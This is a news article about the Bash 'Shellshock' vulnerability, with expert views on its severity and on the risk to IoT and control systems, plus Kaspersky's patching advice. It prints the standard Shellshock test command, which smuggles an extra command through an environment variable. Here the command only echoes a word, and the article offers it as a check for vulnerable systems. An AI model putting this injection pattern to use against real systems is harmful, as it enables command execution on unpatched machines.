Bash 'Shellshock' could be 'more serious than Heartbleed', IoT devices most at risk

Kaspersky offers advice on how to detect and fix the vulnerability
Publish date:
Social count:

Some industry experts are warning that the newly discovered bug in the Bash command shell found in OS X and Linux could be more serous than the Heartbleed bug that hit earlier this year.

“The ‘Shellshock’ bug is a flaw effecting systems using a software component known as ‘Bash’. The term ‘Bash’ may be unfamiliar to many business owners however researchers have estimated up to 500 million systems are affected. These stark figures suggest the bug is far more wide reaching than the infamous Heartbleed vulnerability. Rated 10/10 for severity, the bug may enable attackers to take control of vulnerable systems,” explained Russell Horton, COO at Elite Telecom.

Joe Hancock, cyber security specialist at AEGIS believes IoT devices are at risk and may be difficult to fix: “The devices most at risk are those that make up the ‘Internet of Things’ or Industrial Control Systems. Any legacy device that uses a set of web-scripts to interact directly with the underlying Linux operating system via BASH could be potentially remotely monitored or controlled. For example a major control systems vendor’s Programmable Logic Controllers (PLCs) use the Linux operating system, which has previously been shown to use the BASH software internally. In some areas this will be a challenge to fix, as many embedded devices are not designed with regular updates in mind and will never be able to be patched.”

Not everyone believes that Shellshock poses as much of a threat as Heartbleed. Bitdefender’s senior E-threat specialist, Bogdan Botezatu, has called it a mini-Heartbleed at best: “While the impact might be severe, this is more of a mini-Heartbleed as exploitation is only possible in certain scenarios on these systems. To start with, remote hackers can only target servers running CGI scripts and pass environment variables whereas, in Heartbleed’s case, they interacted more easily with the server. Network-based exploitation is also possible, but it is limited to specific scenarios.”

Regardless of how widespread the problem may become, Kaspersky’s senior security researcher, David Jacoby, has detailed how users can check if their system or website has been affected as well as offering advice on how to fix the problem:

“The easiest way to check if your system is vulnerable is to open a bash-shell on your system and execute the following command:
"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

“If the shell returns the string "vulnerable", you should update your system. Also there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

“[If you're affected] The first thing that you need to do is to update your bash version. Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be really effective yet, patching is the first thing to do.

“If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.

“Also review your webserver configuration. If there are any CGI scripts that you are not using, consider disabling them.”

Binary Code image via